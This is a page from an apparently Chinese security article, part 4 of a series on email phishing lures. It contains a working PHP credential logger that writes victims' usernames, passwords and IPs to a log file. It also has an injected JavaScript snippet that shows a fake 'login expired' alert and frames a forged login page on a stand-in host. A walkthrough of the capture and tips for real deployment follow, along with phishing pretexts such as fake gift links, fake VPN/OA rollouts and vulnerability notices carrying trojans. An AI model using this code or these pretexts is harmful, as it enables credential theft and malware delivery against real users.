主页 > 网络知识 > 邮箱钓鱼的诱饵(4)

邮箱钓鱼的诱饵(4)

<?php $date ='日期:'. date("[Y-m-d H:i:s]")." "; $line = '----------------------------------'." "; $user = '账号:'.$_POST['username']." "; $pwd = '密码:'.$_POST['password']." "; $ip = 'IP:'.getenv('REMOTE_ADDR')." "; $url = '钓鱼模板:'.getenv('HTTP_REFERER')." "; $log = "------------------------------ "; $result = $date.$line.$url.$user.$pwd.$ip.$log; file_put_contents('fish.log',$result, FILE_APPEND); header("Location: :5100/admin_index.html"); ?>

//xxs.js 触发弹窗,跳转至伪造登录界面

setTimeout(function() { alert("登陆过期,请重新登陆!"); parent.document.writeln("<iframe style="margin:0px;padding:0px;height:100%;width:100%;" src = "http://getpasswd/fish.html" frameBorder=0 scrolling=no></iframe>"); setTimeout(function() { document.getElementsByTagName("body")[0].setAttribute("style", "margin: 2px;"); }, 100); setTimeout(function() { parent.document.getElementsByTagName("body")[0].setAttribute("style", "margin: 0px;"); }, 100); }, 10);

以下演示我们的伪造界面抓取密码的流程,当受害者直接访问伪造的管理员后台,过一段时间会发现登录超时的提示,此时证明已经成功加载我们的xss.js代码(注:此处xss.js的代码触发时间可以自行修改,我为了方便修改为10s,真实环境建议设置较长):

 

1609042055_5fe80887c4af465fb61bb.png!small?1609042055253

 

 

1609042152_5fe808e8c34d531ce4e0d.png!small?1609042152229

 

点击确认页面发生跳转至我们提前伪造好的登录界面,接着会触发放置好的get.php文件并调用获取我们的用户名密码:

 

1609042164_5fe808f4d0feeefe16485.png!small?1609042164282

 

执行登录操作后又会跳转至我们伪造的后台界面(实际情况中可以将本地跳转指定到正确的登录界面)

 

1609042172_5fe808fce5121c7b2af9f.png!small?1609042172393

 

从本地日志中我们可以看到受害者输入的用户名密码:

 

1609042178_5fe80902d42390ba15619.png!small?1609042178380

 

 

0x04 甩“鱼钩”

下面简单介绍几个钓鱼案例:

案例一:伪造游戏礼包领取链接(获取用户名密码)

 

1609042191_5fe8090fdb777ab6de673.png!small?1609042191301

 

案例二:伪造新上线系统部署(VPN、OA等其他系统的账号密码获取等)

 

1609042204_5fe8091c52a7e2f1a771d.png!small?1609042204158

 

 

案例三:以内部公司的名义发送漏洞整改通告并附上检测工具(工具为恶意木马可执行上线操作)

 

1609042224_5fe809309ddb5ea4d96eb.png!small?1609042224072

 

 

案例四:以相关部门名义发布整改通告(通过恶意链接获取用户名密码等其他敏感信息)

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!